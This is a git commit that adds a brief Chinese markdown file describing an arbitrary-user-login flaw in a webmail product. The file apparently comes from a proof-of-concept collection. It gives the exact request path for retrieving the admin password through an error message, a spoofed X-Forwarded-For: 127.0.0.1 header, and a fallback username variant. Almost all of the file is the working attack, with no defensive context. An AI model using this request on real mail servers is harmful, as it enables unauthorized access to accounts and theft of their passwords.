Create WEBMAIL存在任意用户登录漏洞.md

This commit is contained in:
wy876 2023-08-21 21:14:00 +08:00 committed by GitHub
parent a076dda9f5
commit 1637ac33fb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,11 @@
## WEBMAIL存在任意用户登录漏洞
```
RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显errormsg为密码
用户名为 admin
添加头 X-Forwarded-For: 127.0.0.1
如果有登录失败的话,使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
```